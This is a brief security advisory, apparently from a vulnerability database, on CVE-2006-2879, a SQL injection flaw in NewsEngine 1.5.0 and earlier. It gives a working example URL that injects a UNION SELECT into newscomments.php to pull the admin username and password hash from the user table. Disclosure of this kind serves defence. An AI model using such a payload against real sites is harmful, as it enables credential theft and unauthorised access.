Topic : | ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
|
SecurityAlert : 1057
CVE : CVE-2006-2879
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : ajannhwt hotmail com
Published : 08.06.2006
Affected Software : | ewsEngine <= 1.5.0 |
 Advisory Content : # Title : NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection
Vulnerability
# Author : ajann
### Vulnerability;
$$$ http://[target]/[path]/newscomments.php
Example:
$$ http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0
,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/news
1_user/**/where/**/userid=1/*
Admin MD5 HaSh
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|